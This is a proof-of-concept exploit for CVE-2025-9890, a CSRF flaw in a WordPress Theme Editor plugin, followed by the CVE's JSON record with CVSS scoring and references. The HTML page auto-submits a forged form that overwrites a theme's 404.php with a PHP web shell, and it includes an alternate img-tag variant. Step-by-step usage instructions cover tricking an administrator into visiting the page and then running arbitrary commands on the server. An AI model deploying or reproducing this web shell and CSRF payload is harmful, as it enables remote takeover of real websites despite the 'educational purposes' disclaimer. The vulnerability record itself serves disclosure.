CVE-2025-9890

<!-- CVE-2025-9890 CSRF to RCE PoC --> <!-- This PoC demonstrates how an unauthenticated attacker can exploit CSRF vulnerability in WordPress Theme Editor plugin to achieve Remote Code Execution --> <html> <head> <title>CVE-2025-9890 - Theme Editor CSRF to RCE</title> </head> <body> <h1>CVE-2025-9890 Exploit PoC</h1> <!-- The attacker hosts this page on a malicious server. When a logged-in WordPress admin visits this page, the form auto-submits and modifies a theme file with a web shell, achieving RCE. --> <form id="csrf-form" action="http://target-wordpress-site.com/wp-admin/admin.php?page=theme_editor_theme" method="POST" enctype="multipart/form-data"> <!-- Target theme file to overwrite --> <input type="hidden" name="theme_file" value="/var/www/html/wp-content/themes/twentytwentyone/404.php" /> <!-- Malicious PHP payload (web shell) --> <input type="hidden" name="theme_content" value="<?php if(isset($_GET['cmd'])){system($_GET['cmd']);} ?>" /> <!-- Action to save the theme file --> <input type="hidden" name="action" value="save" /> </form> <script> // Auto-submit the form when the page loads document.getElementById('csrf-form').submit(); </script> <!-- Alternative method using img tag for simpler exploitation --> <!-- <img src="http://target-wordpress-site.com/wp-admin/admin.php?page=theme_editor_theme&action=save&theme_file=404.php&theme_content=<?php system($_GET['cmd']); ?>" /> --> </body> </html> <!-- Usage: 1. Host this HTML on an attacker-controlled server 2. Trick a logged-in WordPress administrator into visiting this page 3. Once the admin's browser submits the form, the 404.php template file is overwritten with a web shell 4. Access the web shell at: http://target-wordpress-site.com/wp-content/themes/twentytwentyone/404.php?cmd=id 5. Execute arbitrary commands on the server Note: This is a proof-of-concept for educational purposes only. Actual exploitation requires the nonce bypass confirmed in the vulnerability. -->

{"cve": {"id": "CVE-2025-9890", "sourceIdentifier": "[email protected]", "published": "2025-10-18T09:15:34.687", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Theme Editor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0. This is due to missing or incorrect nonce validation on the 'theme_editor_theme' page. This makes it possible for unauthenticated attackers to achieve remote code execution via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/theme-editor/trunk/app/controller/theme_controller.php#L87", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3379404%40theme-editor&new=3379404%40theme-editor&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/77189684-b794-41a0-8fc0-3320032c2f69?source=cve", "source": "[email protected]"}]}}